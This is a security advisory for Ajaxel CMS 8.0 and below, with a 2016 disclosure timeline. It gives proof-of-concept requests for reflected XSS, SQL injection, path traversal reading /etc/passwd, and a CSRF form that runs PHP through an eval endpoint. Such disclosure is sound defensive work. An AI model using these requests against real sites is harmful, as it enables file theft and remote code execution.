Ajaxel CMS 8.0 Multiple Vulnerabilities Vendor: Ajaxel Product web page: http://www.ajaxel.com Affected version: 8.0 and below Summary: Ajaxel CMS is very simple ajaxified CMS and framework for any project needs. Desc: Ajaxel CMS version 8.0 and below suffers from multiple vulnerabilities inlcuding LFI, XSS, SQL injection and remote code execution via CSRF. Tested on: Apache 2.4.10 MySQL 5.5.46 Vendor status: [13.04.2016] Vulnerabilities discovered. [14.04.2016] Vendor contacted. [18.04.2016] Vendor releases patch for version 8.0 to address these issues. [05.05.2016] Public security advisory released. Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski [dizzyduck_at_zeroscience.mk] 1. Reflected XSS: ----------------- GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1 Host: 192.168.10.5 HTTP/1.0 404 Not Found ... ...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200, USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/', REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0, URL_KEY_ADMIN:'cms',... 2. SQL Injection: ----------------- http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi> 3. Local File Disclosure: ------------------------- http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd 4. Cross-Site Request Forgery - RCE PoC: ---------------------------------------- <html> <body> <form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load" method="POST"> <input type="hidden" name="data&#91;eval&#93;" value="phpinfo&#40;&#41;&#59;" /> <input type="hidden" name="a" value="eval" /> <input type="hidden" name="settings&#95;eval&#95;tab&#95;eval&#45;submitted" value="1" /> <input type="submit" value="Execute" /> </form> </body> </html>